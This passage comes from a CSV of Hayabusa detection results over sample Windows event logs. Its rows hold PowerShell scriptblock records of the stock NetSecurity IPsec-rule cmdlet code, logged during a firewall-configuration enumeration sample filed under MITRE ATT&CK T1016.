'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType 
= 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) 
{ $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] 
[string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter 
-Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter 
-Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', 
Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 